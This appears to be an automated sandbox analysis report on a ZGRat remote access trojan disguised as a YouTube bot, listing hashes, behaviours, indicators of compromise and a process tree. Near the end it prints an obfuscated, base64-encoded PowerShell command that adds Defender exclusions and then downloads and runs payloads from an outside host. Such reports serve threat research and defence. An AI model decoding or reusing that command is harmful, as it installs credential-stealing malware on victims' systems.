zgrat | 4f9ea4d924204eed91a7b78dd1ea384507277ae18aaa247e8aa076eb5ea22cb8

Analysis

max time kernel
1799s
max time network
1798s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
07-05-2024 14:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

YT_Bot.exe
Size

2.4MB
MD5

04f2679bb77721b9130be049bf9d37b8
SHA1

5ab36346e37971cf53850faf964442b6330f9451
SHA256

4f9ea4d924204eed91a7b78dd1ea384507277ae18aaa247e8aa076eb5ea22cb8
SHA512

cf1e0e4504d59d867d80d41065b7f206b7928aae81d76ad681762a70fbd441a9f2d239a0ef9ef581c6736ddcd4878952a09382b4d2f494aaed654538e0d5c8cc
SSDEEP

49152:CXjWphUswawH27MSJ7WZ4agjZbaHKgJZ6dEhBlbSkfzPs2sHAiinn:Q6HUdawH27hWZ4agtbsZ6+hBoJ2sHAi2

Score

10^/10

zgrat execution rat spyware stealer

Malware Config

Signatures

Detect ZGRat V1 19 IoCs

resource	yara_rule
behavioral1/files/0x0008000000015e3a-85.dat	family_zgrat_v1
behavioral1/files/0x0007000000015f6d-107.dat	family_zgrat_v1
behavioral1/memory/2708-111-0x0000000000A80000-0x0000000000C86000-memory.dmp	family_zgrat_v1
behavioral1/memory/1624-171-0x0000000001240000-0x0000000001446000-memory.dmp	family_zgrat_v1
behavioral1/memory/880-199-0x0000000000AF0000-0x0000000000CF6000-memory.dmp	family_zgrat_v1
behavioral1/memory/908-1130-0x0000000000D10000-0x0000000000F16000-memory.dmp	family_zgrat_v1
behavioral1/memory/1600-1134-0x0000000001370000-0x0000000001576000-memory.dmp	family_zgrat_v1
behavioral1/memory/2320-1138-0x00000000000A0000-0x00000000002A6000-memory.dmp	family_zgrat_v1
behavioral1/memory/1952-1141-0x00000000001B0000-0x00000000003B6000-memory.dmp	family_zgrat_v1
behavioral1/memory/2416-1144-0x0000000000EC0000-0x00000000010C6000-memory.dmp	family_zgrat_v1
behavioral1/memory/1516-1146-0x0000000000010000-0x0000000000216000-memory.dmp	family_zgrat_v1
behavioral1/memory/1728-1149-0x0000000000200000-0x0000000000406000-memory.dmp	family_zgrat_v1
behavioral1/memory/1580-1150-0x0000000001030000-0x0000000001236000-memory.dmp	family_zgrat_v1
behavioral1/memory/320-1154-0x0000000000DE0000-0x0000000000FE6000-memory.dmp	family_zgrat_v1
behavioral1/memory/1780-1156-0x00000000009F0000-0x0000000000BF6000-memory.dmp	family_zgrat_v1
behavioral1/memory/2504-1157-0x0000000000330000-0x0000000000536000-memory.dmp	family_zgrat_v1
behavioral1/memory/836-1158-0x0000000001350000-0x0000000001556000-memory.dmp	family_zgrat_v1
behavioral1/memory/1612-1159-0x0000000000AD0000-0x0000000000CD6000-memory.dmp	family_zgrat_v1
behavioral1/memory/1796-1160-0x0000000000D80000-0x0000000000F86000-memory.dmp	family_zgrat_v1

Process spawned unexpected child process 15 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1724	836	schtasks.exe	37
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	448	836	schtasks.exe	37
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2908	836	schtasks.exe	37
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2040	836	schtasks.exe	37
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1744	836	schtasks.exe	37
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1772	836	schtasks.exe	37
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1932	836	schtasks.exe	37
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	760	836	schtasks.exe	37
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1940	836	schtasks.exe	37
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	320	836	schtasks.exe	37
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	908	836	schtasks.exe	37
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2384	836	schtasks.exe	37
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1916	836	schtasks.exe	37
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2328	836	schtasks.exe	37
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1064	836	schtasks.exe	37

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

Blocklisted process makes network request 3 IoCs

flow	pid	Process
5	1432	powershell.exe
7	1432	powershell.exe
9	1432	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1740	powershell.exe
1684	powershell.exe
1188	powershell.exe
988	powershell.exe
2392	powershell.exe
1432	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 22 IoCs

pid	Process
2792	Youtube-Viewers.exe
2956	ythyperRuntimedhcpSvc.exe
2708	ythyperRuntimedhcpSvc.exe
1624	lsass.exe
880	explorer.exe
908	wininit.exe
1600	ythyperRuntimedhcpSvc.exe
1284	explorer.exe
2320	cmd.exe
2864	lsass.exe
1952	wininit.exe
2416	explorer.exe
1516	wininit.exe
1728	ythyperRuntimedhcpSvc.exe
1580	explorer.exe
320	cmd.exe
1088	lsass.exe
1780	wininit.exe
2504	explorer.exe
836	ythyperRuntimedhcpSvc.exe
1796	explorer.exe
1612	wininit.exe

Loads dropped DLL 6 IoCs

pid	Process
1432	powershell.exe
1432	powershell.exe
2792	Youtube-Viewers.exe
2792	Youtube-Viewers.exe
2976	cmd.exe
2976	cmd.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
3008	YT_Bot.exe

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Microsoft.NET\RedistList\ythyperRuntimedhcpSvc.exe	ythyperRuntimedhcpSvc.exe
File created	C:\Program Files (x86)\Microsoft.NET\RedistList\3cd3d86b433329	ythyperRuntimedhcpSvc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 15 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
1744	schtasks.exe
1772	schtasks.exe
2384	schtasks.exe
1916	schtasks.exe
2328	schtasks.exe
1724	schtasks.exe
2040	schtasks.exe
1940	schtasks.exe
320	schtasks.exe
1064	schtasks.exe
448	schtasks.exe
760	schtasks.exe
908	schtasks.exe
2908	schtasks.exe
1932	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1432	powershell.exe
1432	powershell.exe
1432	powershell.exe
1432	powershell.exe
1432	powershell.exe
2708	ythyperRuntimedhcpSvc.exe
2708	ythyperRuntimedhcpSvc.exe
2708	ythyperRuntimedhcpSvc.exe
2708	ythyperRuntimedhcpSvc.exe
2708	ythyperRuntimedhcpSvc.exe
2708	ythyperRuntimedhcpSvc.exe
2708	ythyperRuntimedhcpSvc.exe
2708	ythyperRuntimedhcpSvc.exe
2708	ythyperRuntimedhcpSvc.exe
2708	ythyperRuntimedhcpSvc.exe
2708	ythyperRuntimedhcpSvc.exe
2708	ythyperRuntimedhcpSvc.exe
2708	ythyperRuntimedhcpSvc.exe
2708	ythyperRuntimedhcpSvc.exe
2708	ythyperRuntimedhcpSvc.exe
2708	ythyperRuntimedhcpSvc.exe
2708	ythyperRuntimedhcpSvc.exe
2708	ythyperRuntimedhcpSvc.exe
2708	ythyperRuntimedhcpSvc.exe
2708	ythyperRuntimedhcpSvc.exe
2708	ythyperRuntimedhcpSvc.exe
2708	ythyperRuntimedhcpSvc.exe
2708	ythyperRuntimedhcpSvc.exe
2708	ythyperRuntimedhcpSvc.exe
2708	ythyperRuntimedhcpSvc.exe
2708	ythyperRuntimedhcpSvc.exe
2708	ythyperRuntimedhcpSvc.exe
2708	ythyperRuntimedhcpSvc.exe
2708	ythyperRuntimedhcpSvc.exe
2708	ythyperRuntimedhcpSvc.exe
2708	ythyperRuntimedhcpSvc.exe
2708	ythyperRuntimedhcpSvc.exe
2708	ythyperRuntimedhcpSvc.exe
2708	ythyperRuntimedhcpSvc.exe
2708	ythyperRuntimedhcpSvc.exe
2708	ythyperRuntimedhcpSvc.exe
2708	ythyperRuntimedhcpSvc.exe
2708	ythyperRuntimedhcpSvc.exe
2708	ythyperRuntimedhcpSvc.exe
2708	ythyperRuntimedhcpSvc.exe
2708	ythyperRuntimedhcpSvc.exe
2708	ythyperRuntimedhcpSvc.exe
2708	ythyperRuntimedhcpSvc.exe
2708	ythyperRuntimedhcpSvc.exe
2708	ythyperRuntimedhcpSvc.exe
2708	ythyperRuntimedhcpSvc.exe
2708	ythyperRuntimedhcpSvc.exe
2708	ythyperRuntimedhcpSvc.exe
2708	ythyperRuntimedhcpSvc.exe
2708	ythyperRuntimedhcpSvc.exe
2708	ythyperRuntimedhcpSvc.exe
2708	ythyperRuntimedhcpSvc.exe
2708	ythyperRuntimedhcpSvc.exe
2708	ythyperRuntimedhcpSvc.exe
2708	ythyperRuntimedhcpSvc.exe
2708	ythyperRuntimedhcpSvc.exe
2708	ythyperRuntimedhcpSvc.exe
2708	ythyperRuntimedhcpSvc.exe
2708	ythyperRuntimedhcpSvc.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1624	lsass.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1432	powershell.exe
Token: SeDebugPrivilege	2708	ythyperRuntimedhcpSvc.exe
Token: SeDebugPrivilege	2392	powershell.exe
Token: SeDebugPrivilege	1684	powershell.exe
Token: SeDebugPrivilege	988	powershell.exe
Token: SeDebugPrivilege	1740	powershell.exe
Token: SeDebugPrivilege	1188	powershell.exe
Token: SeDebugPrivilege	1624	lsass.exe
Token: SeDebugPrivilege	880	explorer.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: 33	1092	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	1092	AUDIODG.EXE
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: 33	1092	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	1092	AUDIODG.EXE
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe

Suspicious use of FindShellTrayWindow 51 IoCs

pid	Process
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe

Suspicious use of SendNotifyMessage 48 IoCs

pid	Process
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3008	YT_Bot.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3008 wrote to memory of 1432	3008	YT_Bot.exe	28
PID 3008 wrote to memory of 1432	3008	YT_Bot.exe	28
PID 3008 wrote to memory of 1432	3008	YT_Bot.exe	28
PID 3008 wrote to memory of 1432	3008	YT_Bot.exe	28
PID 1432 wrote to memory of 2792	1432	powershell.exe	30
PID 1432 wrote to memory of 2792	1432	powershell.exe	30
PID 1432 wrote to memory of 2792	1432	powershell.exe	30
PID 1432 wrote to memory of 2792	1432	powershell.exe	30
PID 1432 wrote to memory of 2956	1432	powershell.exe	32
PID 1432 wrote to memory of 2956	1432	powershell.exe	32
PID 1432 wrote to memory of 2956	1432	powershell.exe	32
PID 1432 wrote to memory of 2956	1432	powershell.exe	32
PID 2956 wrote to memory of 2236	2956	ythyperRuntimedhcpSvc.exe	33
PID 2956 wrote to memory of 2236	2956	ythyperRuntimedhcpSvc.exe	33
PID 2956 wrote to memory of 2236	2956	ythyperRuntimedhcpSvc.exe	33
PID 2956 wrote to memory of 2236	2956	ythyperRuntimedhcpSvc.exe	33
PID 2236 wrote to memory of 2976	2236	WScript.exe	34
PID 2236 wrote to memory of 2976	2236	WScript.exe	34
PID 2236 wrote to memory of 2976	2236	WScript.exe	34
PID 2236 wrote to memory of 2976	2236	WScript.exe	34
PID 2976 wrote to memory of 2708	2976	cmd.exe	36
PID 2976 wrote to memory of 2708	2976	cmd.exe	36
PID 2976 wrote to memory of 2708	2976	cmd.exe	36
PID 2976 wrote to memory of 2708	2976	cmd.exe	36
PID 2708 wrote to memory of 1740	2708	ythyperRuntimedhcpSvc.exe	53
PID 2708 wrote to memory of 1740	2708	ythyperRuntimedhcpSvc.exe	53
PID 2708 wrote to memory of 1740	2708	ythyperRuntimedhcpSvc.exe	53
PID 2708 wrote to memory of 1684	2708	ythyperRuntimedhcpSvc.exe	54
PID 2708 wrote to memory of 1684	2708	ythyperRuntimedhcpSvc.exe	54
PID 2708 wrote to memory of 1684	2708	ythyperRuntimedhcpSvc.exe	54
PID 2708 wrote to memory of 1188	2708	ythyperRuntimedhcpSvc.exe	55
PID 2708 wrote to memory of 1188	2708	ythyperRuntimedhcpSvc.exe	55
PID 2708 wrote to memory of 1188	2708	ythyperRuntimedhcpSvc.exe	55
PID 2708 wrote to memory of 988	2708	ythyperRuntimedhcpSvc.exe	56
PID 2708 wrote to memory of 988	2708	ythyperRuntimedhcpSvc.exe	56
PID 2708 wrote to memory of 988	2708	ythyperRuntimedhcpSvc.exe	56
PID 2708 wrote to memory of 2392	2708	ythyperRuntimedhcpSvc.exe	57
PID 2708 wrote to memory of 2392	2708	ythyperRuntimedhcpSvc.exe	57
PID 2708 wrote to memory of 2392	2708	ythyperRuntimedhcpSvc.exe	57
PID 2708 wrote to memory of 1680	2708	ythyperRuntimedhcpSvc.exe	63
PID 2708 wrote to memory of 1680	2708	ythyperRuntimedhcpSvc.exe	63
PID 2708 wrote to memory of 1680	2708	ythyperRuntimedhcpSvc.exe	63
PID 1680 wrote to memory of 2560	1680	cmd.exe	65
PID 1680 wrote to memory of 2560	1680	cmd.exe	65
PID 1680 wrote to memory of 2560	1680	cmd.exe	65
PID 1680 wrote to memory of 2428	1680	cmd.exe	66
PID 1680 wrote to memory of 2428	1680	cmd.exe	66
PID 1680 wrote to memory of 2428	1680	cmd.exe	66
PID 1680 wrote to memory of 1624	1680	cmd.exe	67
PID 1680 wrote to memory of 1624	1680	cmd.exe	67
PID 1680 wrote to memory of 1624	1680	cmd.exe	67
PID 1392 wrote to memory of 880	1392	taskeng.exe	71
PID 1392 wrote to memory of 880	1392	taskeng.exe	71
PID 1392 wrote to memory of 880	1392	taskeng.exe	71
PID 1744 wrote to memory of 2340	1744	chrome.exe	73
PID 1744 wrote to memory of 2340	1744	chrome.exe	73
PID 1744 wrote to memory of 2340	1744	chrome.exe	73
PID 1744 wrote to memory of 2120	1744	chrome.exe	75
PID 1744 wrote to memory of 2120	1744	chrome.exe	75
PID 1744 wrote to memory of 2120	1744	chrome.exe	75
PID 1744 wrote to memory of 2120	1744	chrome.exe	75
PID 1744 wrote to memory of 2120	1744	chrome.exe	75
PID 1744 wrote to memory of 2120	1744	chrome.exe	75
PID 1744 wrote to memory of 2120	1744	chrome.exe	75

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\YT_Bot.exe
"C:\Users\Admin\AppData\Local\Temp\YT_Bot.exe"
1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3008
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAbABqACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAagB0AGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdwBoAGIAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYgB6AHQAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwBjAGwALwBZAG8AdQB0AHUAYgBlAC0AVgBpAGUAdwBlAHIAcwAuAHAAZABiACcALAAgADwAIwBqAGEAYQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAG0AegB1ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGIAbABjACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFkAbwB1AHQAdQBiAGUALQBWAGkAZQB3AGUAcgBzAC4AcABkAGIAJwApACkAPAAjAGYAagBkACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwBjAGwALwBMAGUAYQBmAC4AeABOAGUAdAAuAHgAbQBsACcALAAgADwAIwBiAHQAZgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHQAbABsACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGIAegBzACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEwAZQBhAGYALgB4AE4AZQB0AC4AeABtAGwAJwApACkAPAAjAGUAdwBxACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwBjAGwALwBMAGUAYQBmAC4AeABOAGUAdAAuAGQAbABsACcALAAgADwAIwBhAGsAYwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAG0AdQB3ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHoAcQBkACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEwAZQBhAGYALgB4AE4AZQB0AC4AZABsAGwAJwApACkAPAAjAHMAZwBhACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwBjAGwALwBZAG8AdQB0AHUAYgBlAC0AVgBpAGUAdwBlAHIAcwAuAGUAeABlAC4AYwBvAG4AZgBpAGcAJwAsACAAPAAjAHYAeAB5ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAawB2AG0AIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAbgBnAHYAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAWQBvAHUAdAB1AGIAZQAtAFYAaQBlAHcAZQByAHMALgBlAHgAZQAuAGMAbwBuAGYAaQBnACcAKQApADwAIwB6AGMAaQAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBiAG8AbwBrAHIAZQBhAGQAaQBuAGcAMgAwADIANAAuAG4AZQB0AC8AYwBsAC8AWQBvAHUAdAB1AGIAZQAtAFYAaQBlAHcAZQByAHMALgBlAHgAZQAnACwAIAA8ACMAbQBkAGQAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBqAHcAeAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBtAGYAZAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBZAG8AdQB0AHUAYgBlAC0AVgBpAGUAdwBlAHIAcwAuAGUAeABlACcAKQApADwAIwBqAG0AcAAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBiAG8AbwBrAHIAZQBhAGQAaQBuAGcAMgAwADIANAAuAG4AZQB0AC8AcgBlAG0AbwB0AGUALwB5AHQAaAB5AHAAZQByAFIAdQBuAHQAaQBtAGUAZABoAGMAcABTAHYAYwAuAGUAeABlACcALAAgADwAIwBmAHgAcAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAG4AcQBkACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGYAcQBwACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHkAdABoAHkAcABlAHIAUgB1AG4AdABpAG0AZQBkAGgAYwBwAFMAdgBjAC4AZQB4AGUAJwApACkAPAAjAHUAYQBpACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHMAbgByACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBmAGYAdQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBZAG8AdQB0AHUAYgBlAC0AVgBpAGUAdwBlAHIAcwAuAGUAeABlACcAKQA8ACMAYQBqAGwAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdQBhAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHMAcAB1ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHkAdABoAHkAcABlAHIAUgB1AG4AdABpAG0AZQBkAGgAYwBwAFMAdgBjAC4AZQB4AGUAJwApADwAIwBmAGUAYQAjAD4A"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1432
- - C:\Users\Admin\AppData\Local\Temp\Youtube-Viewers.exe
    "C:\Users\Admin\AppData\Local\Temp\Youtube-Viewers.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:2792
- - C:\Users\Admin\AppData\Roaming\ythyperRuntimedhcpSvc.exe
    "C:\Users\Admin\AppData\Roaming\ythyperRuntimedhcpSvc.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:2956
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\ChainReview\OBg87LaDbDWQsMY7IUT23EbHgKkyJlfFMrfs5jJR.vbe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2236
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\ChainReview\EG6ATP28z0IboPcWhHfEXGTe81jh.bat" "
        5⤵
        Loads dropped DLL
        Suspicious use of WriteProcessMemory
        
        PID:2976
      - C:\ChainReview\ythyperRuntimedhcpSvc.exe
        
        "C:\ChainReview/ythyperRuntimedhcpSvc.exe"
        6⤵
        Executes dropped EXE
        Drops file in Program Files directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2708
        
